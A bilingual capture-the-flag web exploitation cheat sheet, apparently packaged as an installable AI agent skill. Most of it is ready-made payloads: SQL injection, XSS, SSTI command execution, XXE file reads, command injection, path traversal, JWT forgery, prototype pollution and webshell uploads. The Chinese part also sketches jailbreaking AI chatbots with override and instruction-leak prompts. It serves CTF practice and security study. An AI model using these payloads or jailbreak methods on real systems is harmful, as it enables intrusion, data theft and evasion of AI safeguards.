CTF Web漏洞利用速查手册 - SQL注入、SSTI、XXE、反序列化、XSS等攻防技术大全

ctf-web by ljagiello/ctf-skills

784 周安装量

694 GitHub Stars

GitHub

安装命令

npx skills add https://github.com/ljagiello/ctf-skills --skill ctf-web

测试安全

🇨🇳中文介绍

CTF Web 漏洞利用

Web CTF 挑战快速参考。每种技术在此处都有一行摘要；完整细节（包含载荷和代码）请参阅支持文件。

额外资源

server-side.md - 核心服务端注入攻击：SQLi（EXIF 元数据注入、MySQL 列截断、反斜杠/十六进制绕过、二阶注入、LIKE 暴力破解、processList 技巧、XML 实体 WAF 绕过）、SSTI（Jinja2、Go、EJS、ERB Sequel 绕过、Mako、Twig、__dict__.update() 引号绕过）、SSRF（Host 头、DNS 重绑定、curl 重定向）、XXE、命令注入（换行符、黑名单绕过、sendmail、多条形码、git CLI 换行符注入）、PHP 类型混淆、PHP 文件包含 / php://filter
server-side-exec.md - 代码执行和服务端访问攻击：Ruby/Perl/JS 代码注入、LaTeX 注入 RCE、PHP preg_replace /e RCE、Prolog 注入、ReDoS 时间侧信道、文件上传→RCE（.htaccess、日志投毒、Python .so 劫持、Gogs 符号链接、ZipSlip）、从 Cookie 进行 PHP 反序列化、PHP extract() 变量覆盖、XPath 盲注、Thymeleaf SpEL SSTI + Spring FileCopyUtils WAF 绕过、SQLi 关键词分段绕过、SQL WHERE ORDER BY 绕过、通过 DNS 记录的 SQL 注入、API 过滤器注入、WebSocket 批量赋值
server-side-deser.md - 反序列化和执行攻击：Java 反序列化（ysoserial 利用链、JNDI 注入、盲检测）、Python pickle RCE（__reduce__、受限 unpickler 绕过、STOP 操作码链接）、竞态条件（TOCTOU 异步利用、双花、优惠券重用）
server-side-advanced.md - 高级服务端技术：ExifTool CVE-2021-22204、Go rune/byte 不匹配、zip 符号链接遍历、路径遍历绕过（大括号剥离、双重 URL 编码、os.path.join、%2f）、Flask/Werkzeug 调试模式、XXE 外部 DTD 过滤器绕过、WeasyPrint SSRF、MongoDB 正则表达式注入、Pongo2 Go 模板注入、ZIP PHP webshell、basename() 绕过、React Server Components Flight RCE (CVE-2025-55182)、SSRF→Docker API RCE 链、Castor XML xsi:type 反序列化 (Atlas HTB)、Apache ErrorDocument 表达式文件读取 (Zero HTB)、SQLite 文件路径遍历绕过字符串相等性检查
- 客户端攻击：XSS、CSRF、CSPT、缓存投毒、DOM 技巧、React 输入填充、隐藏元素、XS-Leak 时间侧信道、GraphQL CSRF、Unicode 大小写折叠 XSS 绕过（长 s U+017F）、CSS 字体字形容器查询数据外泄、Hyperscript CDN CSP 绕过、PBKDF2 前缀时间侧信道、通过泄露的 JS 密钥绕过客户端 HMAC、通过 base 标签劫持绕过 CSP nonce、通过 JSONP 回调外泄的 XSSI

广告位招租

在这里展示您的产品或服务

触达数万 AI 开发者，精准高效

联系我们

SQL 注入快速参考

检测： 发送 ' — 语法错误表明存在 SQLi

' OR '1'='1                    # 经典认证绕过
' OR 1=1--                     # 注释终止
username=\&password= OR 1=1--  # 反斜杠转义引号绕过
' UNION SELECT sql,2,3 FROM sqlite_master--  # SQLite 模式
0x6d656f77                     # 'meow' 的十六进制编码（绕过引号）

XML 实体编码：UNION → UNION 在 XML 解析器解码后，绕过 WAF 关键词过滤器。

EXIF 元数据注入：将 SQL 嵌入图像 EXIF 字段（exiftool -Comment="' UNION SELECT flag FROM flags--" image.jpg）以绕过仅检查 HTTP 参数的 WAF。

有关二阶 SQLi、LIKE 暴力破解、MySQL 列截断、SQLi→SSTI 链、XML 实体 WAF 绕过、EXIF 元数据注入，请参阅 server-side.md。有关通过 DNS 记录的 SQLi、SQLi 关键词分段、PHP preg_replace /e RCE、Prolog 注入，请参阅 server-side-exec.md。

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

过滤器绕过：十六进制 \x3cscript\x3e、实体 <script>、大小写混合 <ScRiPt>、事件处理器。

有关 DOMPurify 绕过、缓存投毒、CSPT、React 输入技巧，请参阅 client-side.md。

通过 JSONP 回调外泄的 XSSI

JSONP 端点（?callback=func）将敏感数据包装在函数调用中。通过带有自定义回调的 <script src> 跨源加载以进行外泄。链：SHA1 cookie 反转 -> 调试端点上的 IDOR -> XSSI -> 云函数 OOB。请参阅 client-side.md。

路径遍历 / LFI 快速参考

../../../etc/passwd
....//....//....//etc/passwd     # 过滤器绕过
..%2f..%2f..%2fetc/passwd        # URL 编码
%252e%252e%252f                  # 双重 URL 编码
{.}{.}/flag.txt                  # 大括号剥离绕过

Python 陷阱： os.path.join('/app/public', '/etc/passwd') 返回 /etc/passwd

alg: none — 完全移除签名
算法混淆 (RS256→HS256) — 使用公钥签名
弱密钥 — 使用 hashcat/flask-unsign 暴力破解
密钥暴露 — 检查 /api/getPublicKey、.env、/debug/config
余额重放 — 保存 JWT，消费，重放旧 JWT，归还物品获利
未验证签名 — 修改载荷，保留原始签名
JWK 头注入 — 在令牌头中嵌入攻击者公钥
JKU 头注入 — 指向攻击者控制的 JWKS URL
KID 路径遍历 — ../../../dev/null 用于空密钥，或 KID 中的 SQL 注入

完整的 JWT/JWE 攻击和会话操纵，请参阅 auth-jwt.md。

检测： {{7*7}} 返回 49

# Jinja2 RCE
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}
# Go 模板
{{.ReadFile "/flag.txt"}}
# EJS
<%- global.process.mainModule.require('child_process').execSync('id') %>
# Jinja2 引号绕过（关键字参数）：
{{obj.__dict__.update(attr=value) or obj.name}}

Mako SSTI (Python)： ${__import__('os').popen('id').read()} — 无沙箱，${} 或 <% %> 内是纯 Python。Twig SSTI (PHP)： {{['id']|map('system')|join}} — 通过 {{7*'7'}} 与 Jinja2 区分（Twig 重复字符串，Jinja2 返回 49）。请参阅 server-side.md 和 server-side.md。

引号过滤器绕过： 使用 __dict__.update(key=value) — 关键字参数不需要引号。请参阅 server-side.md。

ERB SSTI (Ruby/Sinatra)： <%= Sequel::DATABASES.first[:table].all %> 通过全局 Sequel::DATABASES 数组绕过 ERBSandbox 变量名限制。请参阅 server-side.md。

Thymeleaf SpEL SSTI (Java/Spring)： ${T(org.springframework.util.FileCopyUtils).copyToByteArray(new java.io.File("/flag.txt"))} 当标准 I/O 被 WAF 阻止时，通过 Spring 工具类读取文件。适用于无发行版容器（无 shell）。请参阅 server-side-exec.md。

127.0.0.1, localhost, 127.1, 0.0.0.0, [::1]
127.0.0.1.nip.io, 2130706433, 0x7f000001

用于 TOCTOU 的 DNS 重绑定：https://lock.cmpxchg8b.com/rebinder.html

Host 头 SSRF： 服务器从 Host 头构建内部请求 URL（例如，http.Get("http://" + request.Host + "/validate")）。将 Host 设置为攻击者域名 → 验证请求发送到攻击者服务器。请参阅 server-side.md。

命令注入快速参考

; id          | id          `id`          $(id)
%0aid         # 换行符     127.0.0.1%0acat /flag

当 cat/head 被阻止时：sed -n p flag.txt、awk '{print}'、tac flag.txt

Git CLI 换行符注入： URL 路径中的 %0a 可突破仅过滤 ;|&<> 的反引号/system() shell 调用。请参阅 server-side.md。

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

PHP 过滤器：<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt">

PHP 类型混淆快速参考

宽松的 == 执行类型强制转换：0 == "string" 为 true，"0e123" == "0e456" 为 true（魔术哈希）。发送 JSON 整数 0 以绕过字符串密码检查。strcmp([], "str") 返回 NULL，这会使 !strcmp() 通过。使用 === 进行防御。

有关比较表和利用载荷，请参阅 server-side.md。

PHP 文件包含 / LFI 快速参考

php://filter/convert.base64-encode/resource=config 在不执行的情况下泄露 PHP 源代码。常见的 LFI 目标：/etc/passwd、/proc/self/environ、应用配置文件。空字节（%00）在 PHP < 5.3.4 上截断 .php 后缀。

有关过滤器链和 RCE 技术，请参阅 server-side.md。

代码注入快速参考

Rubyinstance_eval： 中断字符串 + 注释：VALID');INJECTED_CODE# Perlopen()： 2 参数 open 允许管道：|command| JSeval 黑名单绕过： row['con'+'structor']['con'+'structor']('return this')() PHP 反序列化： 在 cookie 中构造序列化对象 → LFI/RCE LaTeX 注入： \input{|"cat /flag.txt"} — 通过 PDF 生成服务中的管道语法执行 shell 命令。\@@input"/etc/passwd" 用于无需 shell 的文件读取。

完整的载荷和绕过技术，请参阅 server-side-exec.md。

序列化的 Java 对象（rO0AB / aced0005）+ ysoserial 利用链 → 通过 ObjectInputStream.readObject() 实现 RCE。尝试 CommonsCollections1-7、URLDNS 进行盲检测。请参阅 server-side-deser.md。

Python Pickle 反序列化

pickle.loads() 调用 __reduce__() → (os.system, ('cmd',)) 即时 RCE。也可通过 yaml.load()、torch.load()、joblib.load() 实现。请参阅 server-side-deser.md。

竞态条件 (TOCTOU)

并发请求绕过检查后执行模式（余额、优惠券、注册）。发送 50 个同时请求 — 所有请求都看到修改前的状态。请参阅 server-side-deser.md。

Node.js 快速参考

原型污染： {"__proto__": {"isAdmin": true}} 或 flatnest 循环引用绕过 VM 逃逸： this.constructor.constructor("return process")() → RCE 完整链： 污染 → 在 Happy-DOM 中启用 JS eval → VM 逃逸 → RCE

原型污染权限绕过 (Server OC, Pragyan 2026)：

# 当 Express.js 端点检查 req.body.isAdmin 或类似内容时：
curl -X POST -H 'Content-Type: application/json' \
  -d '{"Path":"value","__proto__":{"isAdmin":true}}' \
  'https://target/endpoint'
# __proto__ 污染 Object.prototype，使所有对象上的 isAdmin 为真值

关键洞察： 始终在 JSON 端点上尝试 __proto__ 注入，即使漏洞看起来像其他东西（竞态条件、SSRF 等）。

详细利用，请参阅 node-and-prototype.md。

认证与访问控制快速参考

Cookie 操纵：role=admin、isAdmin=true
公共管理员登录 cookie 播种：检查 /admin/login 是否设置可重用的管理员会话 cookie
Host 头绕过：Host: 127.0.0.1
隐藏端点：在 JS 包中搜索 /api/internal/、/api/admin/；使用认证 cookie 对非 /api 路由（如 /internal/*）进行模糊测试
客户端关卡：window.overrideAccess = true 或直接调用 API
密码推断：个人资料数据 + 结构化 ID 格式 → 暴力破解
弱签名：检查是否仅验证哈希的前 N 个字符
仿射密码 OTP：只有 312 个可能值（12 次乘法 × 26 次加法），几秒钟内暴力破解所有值
Express.js %2F 中间件绕过：/api/export%2Fchat 跳过 app.all("/api/export/chat") 中间件；nginx 在代理前解码 %2F
WIP 端点上的 IDOR（不安全的直接对象引用）：grep 查找 WIP/TODO/debug 注释，将认证装饰器与生产端点进行比较
Git 历史凭证泄露：git log -p --all -S "password" 查找已删除的密钥
CI/CD 变量窃取：GitLab/Jenkins/GitHub CI/CD 变量存储服务账户令牌
身份提供者 API 接管：管理员令牌 → 设置任何用户的密码，使用 not_configured_action: skip 绕过 MFA
SAML SSO 自动化：在整个流程中保留 RelayState，将签名的 SAMLResponse 提交到回调
Guacamole 参数提取：API 令牌或 MySQL 访问暴露 SSH 密钥和密码短语
登录页面投毒：将凭证记录器注入登录页面，从 /dev/shm/creds.txt 收集自动化登录
TeamCity REST API RCE：管理员凭据 → 创建项目 → 添加构建步骤 → 触发构建（以构建代理用户身份运行，通常是 root）

Apache mod_status 信息泄露

/server-status 端点显示活动 URL、客户端 IP 和会话数据。用于发现管理员端点和会话伪造。请参阅 auth-and-access.md。

将开放重定向（?redirect=、?next=、?url=）与 OAuth 流程链接以窃取令牌。使用 @、%00、//、\、CRLF 绕过验证。请参阅 auth-and-access.md。

悬空 CNAME → 在外部服务（GitHub Pages、S3、Heroku）上声明资源。使用 subfinder + httpx 枚举，检查指纹。请参阅 auth-and-access.md。

访问控制绕过，请参阅 auth-and-access.md；JWT/JWE 攻击，请参阅 auth-jwt.md；OAuth/SAML/CI-CD/基础设施认证，请参阅 auth-infra.md。

文件上传 → RCE

.htaccess 上传：AddType application/x-httpd-php .lol + webshell
Gogs 符号链接：用 core.sshCommand RCE 覆盖 .git/config
Python .so 劫持：写入恶意共享对象 + 删除 .pyc 以强制重新导入
ZipSlip：zip 中的符号链接用于文件读取，路径遍历用于文件写入
日志投毒：User-Agent 中的 PHP 载荷 + 路径遍历以包含日志

详细步骤，请参阅 server-side-exec.md。

0xClinic 链： 密码推断 → 路径遍历 + ReDoS 侧信道（从 /proc/1/environ 泄露密钥） → CRLF 注入（CSP 绕过 + 缓存投毒 + XSS） → urllib 协议绕过（SSRF） → 通过路径遍历写入 .so → RCE

关键链接洞察：

路径遍历 + 任何文件读取原语 → 泄露 /proc/*/environ、/proc/*/cmdline
头中的 CRLF → CSP 绕过 + 缓存投毒 + XSS 一次完成
Python 中的任意文件写入 → .so 劫持或 .pyc 覆盖以实现 RCE
小写的响应体 → 使用十六进制转义（\x3c 代表 <）

sqlmap -u "http://target/?id=1" --dbs       # SQLi
ffuf -u http://target/FUZZ -w wordlist.txt   # 目录模糊测试
flask-unsign --decode --cookie "eyJ..."      # JWT 解码
hashcat -m 16500 jwt.txt wordlist.txt        # JWT 破解
dalfox url http://target/?q=test             # XSS

Flask/Werkzeug 调试模式

弱会话密钥暴力破解 + 伪造管理员会话 + Werkzeug 调试器 PIN RCE。完整攻击链，请参阅 server-side-advanced.md。

带有外部 DTD 过滤器绕过的 XXE

在外部托管恶意 DTD 以绕过上传关键词过滤器。载荷和 webhook.site 设置，请参阅 server-side-advanced.md。

移除尾部的 ()()，在 Node.js 中 eval，.toString() 显示原始代码。请参阅 client-side.md。

通过 jQuery Hashchange 的 DOM XSS (Crypto-Cat)

$(location.hash) + hashchange 事件 → 通过 iframe 实现 XSS：<iframe src="https://target/#" onload="this.src+='<img src=x onerror=print()>'">。请参阅 client-side.md。

代理 attachShadow 以捕获封闭根；(0,eval) 用于作用域逃逸；</script> 注入。请参阅 client-side.md。

DOM 冲突 + MIME 不匹配

.jpg 以 text/html 提供；<form id="config"> 冲突 JS 全局变量。请参阅 client-side.md。

通过缓存代理的 HTTP 请求走私

缓存代理不同步，通过不完整的 POST 主体进行 cookie 窃取。请参阅 client-side.md。

路径遍历：URL 编码斜杠绕过

%2f 绕过 nginx 路由匹配，但文件系统会解析它。请参阅 server-side-advanced.md。

WeasyPrint SSRF 和文件读取 (CVE-2024-28184)

<a rel="attachment" href="file:///flag.txt"> 或 <link rel="attachment" href="http://127.0.0.1/admin"> -- WeasyPrint 将获取的内容作为 PDF 附件嵌入，绕过头部检查。通过 /Type /EmbeddedFile 存在性实现布尔侧信道。请参阅 server-side-advanced.md 和 cves.md。

MongoDB 正则表达式 / $where 盲注

使用 a^/)||(<condition>)&&(/a^ 突破 /.../i。使用 charCodeAt() 进行二分查找提取。请参阅 server-side-advanced.md。

Pongo2 / Go 模板注入

上传文件中的 {% include "/flag.txt" %} + 模板参数中的路径遍历。请参阅 server-side-advanced.md。

包含 PHP Webshell 的 ZIP 上传

上传包含 .php 文件的 ZIP → 解压到 Web 可访问目录 → file_get_contents('/flag.txt')。请参阅 server-side-advanced.md。

用于隐藏文件的 basename() 绕过

basename() 仅剥离目录，不过滤同一目录中的 .lock 或隐藏文件。请参阅 server-side-advanced.md。

自定义线性 MAC 伪造

基于 XOR 的线性签名，带有秘密块 → 从已知对中恢复 → 为目标伪造。请参阅 auth-and-access.md。

CSS/JS 付费墙绕过

CSS 覆盖层（position: fixed; z-index: 99999）后面的内容仍在原始 HTML 中。curl 或查看源代码可立即绕过。请参阅 client-side.md。

SSRF → Docker API RCE 链

SSRF 到端口 2375 上未经认证的 Docker 守护进程。使用 /archive 进行文件提取，/exec + /exec/{id}/start 进行命令执行。当 SSRF 仅为 GET 时，通过内部 POST 中继链接。请参阅 server-side-advanced.md。

通过 xsi:type 的 Castor XML 反序列化 (Atlas HTB)

没有映射文件的 Castor XML Unmarshaller 信任 xsi:type 属性来实例化任意 Java 类。通过 ysoserial CommonsBeanutils1 链接 JNDI（Java 命名和目录接口）/ RMI（远程方法调用）以实现 RCE。需要 Java 11（非 17+）。检查 pom.xml 中的 castor-xml。请参阅 server-side-advanced.md。

Apache ErrorDocument 表达式文件读取 (Zero HTB)

带有 ErrorDocument 404 "%{file:/etc/passwd}" 的 .htaccess 在 Apache 级别读取文件，绕过 php_admin_flag engine off。需要 AllowOverride FileInfo。通过 SFTP 上传，通过 404 请求触发。请参阅 server-side-advanced.md。

HTTP TRACE 方法绕过

对 GET/POST 返回 403 的端点可能响应 TRACE、PUT、PATCH 或 DELETE。使用 curl -X TRACE 测试。请参阅 auth-and-access.md。

LLM/AI 聊天机器人越狱

守卫 flag 的 AI 聊天机器人可以通过系统覆盖提示、角色反转或指令泄露请求来绕过。轮换会话 ID 并提升提示严重性。请参阅 [auth-and-access.md](https://github.com/ljagiello/ctf-skills/blob/

🇺🇸English

CTF Web Exploitation

Quick reference for web CTF challenges. Each technique has a one-liner here; see supporting files for full details with payloads and code.

Additional Resources

server-side.md - Core server-side injection attacks: SQLi (EXIF metadata injection, MySQL column truncation, backslash/hex bypass, second-order, LIKE brute-force, processList trick, XML entity WAF bypass), SSTI (Jinja2, Go, EJS, ERB Sequel bypass, Mako, Twig, __dict__.update() quote bypass), SSRF (Host header, DNS rebinding, curl redirect), XXE, command injection (newline, blocklist bypass, sendmail, multi-barcode, git CLI newline injection), PHP type juggling, PHP file inclusion / php://filter
server-side-exec.md - Code execution and server-side access attacks: Ruby/Perl/JS code injection, LaTeX injection RCE, PHP preg_replace /e RCE, Prolog injection, ReDoS timing oracle, file upload→RCE (.htaccess, log poisoning, Python .so hijack, Gogs symlink, ZipSlip), PHP deserialization from cookies, PHP extract() variable overwrite, XPath blind injection, Thymeleaf SpEL SSTI + Spring FileCopyUtils WAF bypass, SQLi keyword fragmentation bypass, SQL WHERE ORDER BY bypass, SQL injection via DNS records, API filter injection, WebSocket mass assignment
server-side-deser.md - Deserialization and execution attacks: Java deserialization (ysoserial gadget chains, JNDI injection, blind detection), Python pickle RCE (__reduce__, restricted unpickler bypass, STOP opcode chaining), race conditions (TOCTOU async exploits, double-spend, coupon reuse)
server-side-advanced.md - Advanced server-side techniques: ExifTool CVE-2021-22204, Go rune/byte mismatch, zip symlink traversal, path traversal bypasses (brace stripping, double URL encoding, os.path.join, %2f), Flask/Werkzeug debug mode, XXE external DTD filter bypass, WeasyPrint SSRF, MongoDB regex injection, Pongo2 Go template injection, ZIP PHP webshell, basename() bypass, React Server Components Flight RCE (CVE-2025-55182), SSRF→Docker API RCE chain, Castor XML xsi:type deserialization (Atlas HTB), Apache ErrorDocument expression file read (Zero HTB), SQLite file path traversal to bypass string equality
client-side.md - Client-side attacks: XSS, CSRF, CSPT, cache poisoning, DOM tricks, React input filling, hidden elements, XS-Leak timing oracle, GraphQL CSRF, Unicode case folding XSS bypass (long-s U+017F), CSS font glyph container query exfiltration, Hyperscript CDN CSP bypass, PBKDF2 prefix timing oracle, client-side HMAC bypass via leaked JS secret, CSP nonce bypass via base tag hijacking, XSSI via JSONP callback exfiltration
auth-and-access.md - Auth/authz attacks: password inference, weak validation, client-side gates, NoSQL auth bypass, HAProxy/Express.js bypass, IDOR on WIP endpoints, HTTP TRACE method bypass, LLM/AI chatbot jailbreak, open redirect chains (OAuth token theft), subdomain takeover, Apache mod_status info disclosure + session forging, JA4/JA4H TLS fingerprint matching
auth-jwt.md - JWT/JWE token attacks: algorithm none, RS256→HS256 confusion, weak secret, unverified signature, JWK/JKU header injection, KID path traversal, balance replay, JWE forgery with exposed public key
auth-infra.md - Infrastructure auth: OAuth/OIDC exploitation (redirect_uri bypass, token manipulation, state CSRF), CORS misconfiguration, git history credential leakage, CI/CD variable theft, identity provider API takeover (authentik/Keycloak), SAML SSO flow automation, Guacamole parameter extraction, login page poisoning, TeamCity REST API RCE
node-and-prototype.md - Node.js: prototype pollution, VM sandbox escape, Happy-DOM chain, flatnest CVE, Lodash+Pug AST injection
web3.md - Blockchain/Web3: Solidity exploits, proxy patterns, ABI encoding tricks, transient storage clearing collision (0.8.28-0.8.33), Foundry tooling
cves.md - CVE-specific exploits: Next.js middleware bypass, curl credential leak, Uvicorn CRLF, urllib scheme bypass, ExifTool DjVu, broken auth, AAEncode/JJEncode, protocol multiplexing, React Server Components Flight RCE (CVE-2025-55182), Ruby-SAML XPath digest smuggling (CVE-2024-45409, Barrier HTB), PaperCut NG auth bypass + RCE (CVE-2023-27350, Bamboo HTB), Zabbix blind SQLi (CVE-2024-22120, Watcher HTB)

Reconnaissance

View source for HTML comments, check JS/CSS files for internal APIs
Look for .map source map files
Check response headers for custom X- headers and auth hints
Common paths: /robots.txt, /sitemap.xml, /.well-known/, /admin, /api, /debug, /.git/, /.env
Search JS bundles: grep -oE '"/api/[^"]+"' for hidden endpoints
Check for client-side validation that can be bypassed

SQL Injection Quick Reference

Detection: Send ' — syntax error indicates SQLi

' OR '1'='1                    # Classic auth bypass
' OR 1=1--                     # Comment termination
username=\&password= OR 1=1--  # Backslash escape quote bypass
' UNION SELECT sql,2,3 FROM sqlite_master--  # SQLite schema
0x6d656f77                     # Hex encoding for 'meow' (bypass quotes)

XML entity encoding: UNION → UNION after XML parser decodes, bypasses WAF keyword filters.

EXIF metadata injection: embed SQL in image EXIF fields (exiftool -Comment="' UNION SELECT flag FROM flags--" image.jpg) to bypass WAFs that only inspect HTTP parameters.

See server-side.md for second-order SQLi, LIKE brute-force, MySQL column truncation, SQLi→SSTI chains, XML entity WAF bypass, EXIF metadata injection. See server-side-exec.md for SQLi via DNS records, SQLi keyword fragmentation, PHP preg_replace /e RCE, Prolog injection.

XSS Quick Reference

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

Filter bypass: hex \x3cscript\x3e, entities <script>, case mixing <ScRiPt>, event handlers.

See client-side.md for DOMPurify bypass, cache poisoning, CSPT, React input tricks.

XSSI via JSONP Callback Exfiltration

JSONP endpoint (?callback=func) wraps sensitive data in a function call. Load cross-origin via <script src> with custom callback to exfiltrate. Chain: SHA1 cookie inversion -> IDOR on debug endpoint -> XSSI -> cloud function OOB. See client-side.md.

Path Traversal / LFI Quick Reference

../../../etc/passwd
....//....//....//etc/passwd     # Filter bypass
..%2f..%2f..%2fetc/passwd        # URL encoding
%252e%252e%252f                  # Double URL encoding
{.}{.}/flag.txt                  # Brace stripping bypass

Python footgun: os.path.join('/app/public', '/etc/passwd') returns /etc/passwd

JWT Quick Reference

alg: none — remove signature entirely
Algorithm confusion (RS256→HS256) — sign with public key
Weak secret — brute force with hashcat/flask-unsign
Key exposure — check /api/getPublicKey, .env, /debug/config
Balance replay — save JWT, spend, replay old JWT, return items for profit
Unverified signature — modify payload, keep original signature
JWK header injection — embed attacker public key in token header
JKU header injection — point to attacker-controlled JWKS URL
KID path traversal — ../../../dev/null for empty key, or SQL injection in KID

See auth-jwt.md for full JWT/JWE attacks and session manipulation.

SSTI Quick Reference

Detection: {{7*7}} returns 49

# Jinja2 RCE
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}
# Go template
{{.ReadFile "/flag.txt"}}
# EJS
<%- global.process.mainModule.require('child_process').execSync('id') %>
# Jinja2 quote bypass (keyword args):
{{obj.__dict__.update(attr=value) or obj.name}}

Mako SSTI (Python): ${__import__('os').popen('id').read()} — no sandbox, plain Python inside ${} or <% %>. Twig SSTI (PHP): {{['id']|map('system')|join}} — distinguish from Jinja2 via {{7*'7'}} (Twig repeats string, Jinja2 returns 49). See server-side.md and server-side.md.

Quote filter bypass: Use __dict__.update(key=value) — keyword arguments need no quotes. See server-side.md.

ERB SSTI (Ruby/Sinatra): <%= Sequel::DATABASES.first[:table].all %> bypasses ERBSandbox variable-name restrictions via the global Sequel::DATABASES array. See server-side.md.

Thymeleaf SpEL SSTI (Java/Spring): ${T(org.springframework.util.FileCopyUtils).copyToByteArray(new java.io.File("/flag.txt"))} reads files via Spring utility classes when standard I/O is WAF-blocked. Works in distroless containers (no shell). See server-side-exec.md.

SSRF Quick Reference

127.0.0.1, localhost, 127.1, 0.0.0.0, [::1]
127.0.0.1.nip.io, 2130706433, 0x7f000001

DNS rebinding for TOCTOU: https://lock.cmpxchg8b.com/rebinder.html

Host header SSRF: Server builds internal request URL from Host header (e.g., http.Get("http://" + request.Host + "/validate")). Set Host to attacker domain → validation request goes to attacker server. See server-side.md.

Command Injection Quick Reference

; id          | id          `id`          $(id)
%0aid         # Newline     127.0.0.1%0acat /flag

When cat/head blocked: sed -n p flag.txt, awk '{print}', tac flag.txt

Git CLI newline injection: %0a in URL path breaks out of backtick/system() shell calls that only filter ;|&<>. See server-side.md.

XXE Quick Reference

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

PHP filter: <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt">

PHP Type Juggling Quick Reference

Loose == performs type coercion: 0 == "string" is true, "0e123" == "0e456" is true (magic hashes). Send JSON integer 0 to bypass string password checks. strcmp([], "str") returns NULL which passes !strcmp(). Use === for defense.

See server-side.md for comparison table and exploit payloads.

PHP File Inclusion / LFI Quick Reference

php://filter/convert.base64-encode/resource=config leaks PHP source code without execution. Common LFI targets: /etc/passwd, /proc/self/environ, app config files. Null byte (%00) truncates .php suffix on PHP < 5.3.4.

See server-side.md for filter chains and RCE techniques.

Code Injection Quick Reference

Rubyinstance_eval: Break string + comment: VALID');INJECTED_CODE# Perlopen(): 2-arg open allows pipe: |command| JSeval blocklist bypass: row['con'+'structor']['con'+'structor']('return this')() PHP deserialization: Craft serialized object in cookie → LFI/RCE LaTeX injection: \input{|"cat /flag.txt"} — shell command via pipe syntax in PDF generation services. \@@input"/etc/passwd" for file reads without shell.

See server-side-exec.md for full payloads and bypass techniques.

Java Deserialization

Serialized Java objects (rO0AB / aced0005) + ysoserial gadget chains → RCE via ObjectInputStream.readObject(). Try CommonsCollections1-7, URLDNS for blind detection. See server-side-deser.md.

Python Pickle Deserialization

pickle.loads() calls __reduce__() → (os.system, ('cmd',)) instant RCE. Also via yaml.load(), torch.load(), joblib.load(). See server-side-deser.md.

Race Conditions (TOCTOU)

Concurrent requests bypass check-then-act patterns (balance, coupons, registration). Send 50 simultaneous requests — all see pre-modification state. See server-side-deser.md.

Node.js Quick Reference

Prototype pollution: {"__proto__": {"isAdmin": true}} or flatnest circular ref bypass VM escape: this.constructor.constructor("return process")() → RCE Full chain: pollution → enable JS eval in Happy-DOM → VM escape → RCE

Prototype pollution permission bypass (Server OC, Pragyan 2026):

# When Express.js endpoint checks req.body.isAdmin or similar:
curl -X POST -H 'Content-Type: application/json' \
  -d '{"Path":"value","__proto__":{"isAdmin":true}}' \
  'https://target/endpoint'
# __proto__ pollutes Object.prototype, making isAdmin truthy on all objects

Key insight: Always try __proto__ injection on JSON endpoints, even when the vulnerability seems like something else (race condition, SSRF, etc.).

See node-and-prototype.md for detailed exploitation.

Auth & Access Control Quick Reference

Cookie manipulation: role=admin, isAdmin=true
Public admin-login cookie seeding: check if /admin/login sets reusable admin session cookie
Host header bypass: Host: 127.0.0.1
Hidden endpoints: search JS bundles for /api/internal/, /api/admin/; fuzz with auth cookie for non-/api routes like /internal/*
Client-side gates: window.overrideAccess = true or call API directly
Password inference: profile data + structured ID format → brute-force
Weak signature: check if only first N chars of hash are validated

Apache mod_status Information Disclosure

/server-status endpoint reveals active URLs, client IPs, and session data. Use for admin endpoint discovery and session forging. See auth-and-access.md.

Open Redirect Chains

Chain open redirects (?redirect=, ?next=, ?url=) with OAuth flows for token theft. Bypass validation with @, %00, //, \, CRLF. See auth-and-access.md.

Subdomain Takeover

Dangling CNAME → claim resource on external service (GitHub Pages, S3, Heroku). Use subfinder + httpx to enumerate, check fingerprints. See auth-and-access.md.

See auth-and-access.md for access control bypasses, auth-jwt.md for JWT/JWE attacks, and auth-infra.md for OAuth/SAML/CI-CD/infrastructure auth.

File Upload → RCE

.htaccess upload: AddType application/x-httpd-php .lol + webshell
Gogs symlink: overwrite .git/config with core.sshCommand RCE
Python .so hijack: write malicious shared object + delete .pyc to force reimport
ZipSlip: symlink in zip for file read, path traversal for file write
Log poisoning: PHP payload in User-Agent + path traversal to include log

See server-side-exec.md for detailed steps.

Multi-Stage Chain Patterns

0xClinic chain: Password inference → path traversal + ReDoS oracle (leak secrets from /proc/1/environ) → CRLF injection (CSP bypass + cache poisoning + XSS) → urllib scheme bypass (SSRF) → .so write via path traversal → RCE

Key chaining insights:

Path traversal + any file-reading primitive → leak /proc/*/environ, /proc/*/cmdline
CRLF in headers → CSP bypass + cache poisoning + XSS in one shot
Arbitrary file write in Python → .so hijacking or .pyc overwrite for RCE
Lowercased response body → use hex escapes (\x3c for <)

Useful Tools

sqlmap -u "http://target/?id=1" --dbs       # SQLi
ffuf -u http://target/FUZZ -w wordlist.txt   # Directory fuzzing
flask-unsign --decode --cookie "eyJ..."      # JWT decode
hashcat -m 16500 jwt.txt wordlist.txt        # JWT crack
dalfox url http://target/?q=test             # XSS

Flask/Werkzeug Debug Mode

Weak session secret brute-force + forge admin session + Werkzeug debugger PIN RCE. See server-side-advanced.md for full attack chain.

XXE with External DTD Filter Bypass

Host malicious DTD externally to bypass upload keyword filters. See server-side-advanced.md for payload and webhook.site setup.

JSFuck Decoding

Remove trailing ()(), eval in Node.js, .toString() reveals original code. See client-side.md.

DOM XSS via jQuery Hashchange (Crypto-Cat)

$(location.hash) + hashchange event → XSS via iframe: <iframe src="https://target/#" onload="this.src+='<img src=x onerror=print()>'">. See client-side.md.

Shadow DOM XSS

Proxy attachShadow to capture closed roots; (0,eval) for scope escape; </script> injection. See client-side.md.

DOM Clobbering + MIME Mismatch

.jpg served as text/html; <form id="config"> clobbers JS globals. See client-side.md.

HTTP Request Smuggling via Cache Proxy

Cache proxy desync for cookie theft via incomplete POST body. See client-side.md.

Path Traversal: URL-Encoded Slash Bypass

